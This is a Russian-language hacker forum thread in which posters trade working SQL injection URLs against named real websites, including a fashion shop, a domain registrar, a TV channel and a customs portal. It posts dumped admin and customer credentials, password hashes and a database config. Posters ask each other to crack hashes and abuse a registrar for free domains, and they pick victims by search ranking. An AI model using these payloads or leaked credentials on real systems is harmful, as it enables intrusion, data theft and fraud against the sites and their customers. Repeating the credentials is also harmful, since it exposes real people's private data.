SQL Инъекции

jokester, сорри)
Исправляемся:
Сйт представляет услугу мониторинга seo-параметров, таких как
Индекс цетирования Yandex тИЦ
Индекс Google PageRank
Количество проиндексированных страниц в Yandex

Code:

http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6+from+users--

Логин/пасс:

Code:

tigranav:8791109100

--------------------------------------------------
The End!

 

purple.fr магазинчик

http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database(),user())/*

5.0.32-Debian_7etch8-log/purple/purple@localhost


http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login,passwd))+from+user/*

root/6teutd7UL7NG.


http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from+customer+limit+4200,1/*

[email protected]/19l0ZUzMeK.b.

 

Code:

http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8+from+users--

aDMin:03110WoodBury

 

Вот кароче что я обкуренный нафигачил:

Code:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

Из таблицы tbladmins:

Code:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

А вот составить финальный запрос не получилось, как я токо не шифровал...((((

Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!

 

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(username,0x3A,password)))),3,4,5+from+naira_clients.tbladmins--
За group_concat - спасибо, незнал.

 

-m0rgan-, а финальный - это какой ?)

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password),3,4,5+from+naira_clients.tbladmins

ADMIN/E7AA807F2B59DE7B73495FF59B30EC26

опередили, потрите плз )

 

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))

 

А мне он выдал

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5+from+admins--

master:master

тока в админку не пускает (

 

И мне в ПМ плз!!!!

 

Aattcottonbowl.com - PR5 ~2к

4 ветка.. подбирайте поля )

 

// Оффтоп
A чё это за naira_clients?
Обьясните плиз!

 

ТИЦ:160
PR:6
5.0.22-standard-logwebmaster@localhostvfscom_db

PR:2
4.1.22-standardwomenast_Astronomerswomenast_User@localhost

 

Code:

http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

gtacom_gta@localhost:5.0.51a-community:gtacom_gta

Code:

http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+0,1--

Code:

http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin+limit+0,2--

adminus:lPO7YBB0

PR : 3
ТиЦ : 300

 

Samuseum.org - PR5 ~1.5к

Brightstar.com.tw - PR3 ~0.5к

http://www.brightstar.com.tw/asp_admin/index.fcgi

 

pro100.tv
Я конечно ХЗ но для меня это канал сектантов (CNL)
Целыми днями трындят о "боге", это ппц, сектанты херовы!!!111
Ни админки, ничё не нащёл, у них сайт из 1 файла штоле...

Code:

http://pro100.tv/comments.php?curid=-1'+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,VERSION(),DATABASE(),USER()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*

А вот и сам канал

Code:

http://www.cnl.tv/watch_us/programs.php?programID=-1'+UNION+SELECT+concat_ws(0x3a,VERSION(),DATABASE(),USER())/*

Вывод в тайтле

Code:

5.0.45:cnl_tv_2008:cnl_tv_user@localhost

===============
Итого:
http://www.cnl.tv/admin/
emanuel:supertest
http://www.cnl.tv/admin/file_editor.inc.php токо чёто он не пахает
Прав нет =\
Зато конфиг есть

Code:

/mySQL
$DatabaseName 			= "cnltv3_utf8";
$DbHostName 			= "localhost";
$DbUserName 			= "cnltv3_cnluser";
$admin_password			= "cnlconnect"; // for admin directly in pages. like Read more function.

Серверный путь походу /home/cnl.tv/html
Аа... Или "D:/WebServers/home/nlbc/cnl.tv"; //D:/WebServers/home/192.168.0.24/www

Тута есть залитие имаг, если выбрать Flag icon то должна залиться в http://www.cnl.tv/mages/flags/ но толи у мя проксик левый толи прав нет

 

Code:

http://guttenberg.org.ru/f_mess.php?thing=-3+union+select+1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6--

tarifsss_gb@localhost:tarifsss_gb:4.0.27-log

 

24rus.ru - PR6 ~2.5к

хоть какойто вывод

19rus.ru - PR6 ~2.5к

наслаждаемся пищей) делимся результатов в пм )

 

http://www.alta.ru/faq.php?id=-1+union+select+concat_ws(char(32,45,32),admin_id,login,password,checknum,agent,email,access),2,3,4,5+from+altaru_dealers.svts_admins--
ТИЦ : 450 PR: 5
Есть форум с 2722 юзеров.
--------

 

http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
А далее мозгов не хватает

 

Code:

http://www.megaprint.com.ua/product.php?idr=107&idt=-1+union+select+group_concat(table_name,0x3a,table_rows),2,3,4,5,6+from+information_schema.tables--

Code:

http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/concat(login,0x3a,password)/**/from/**/users+limit+0,1--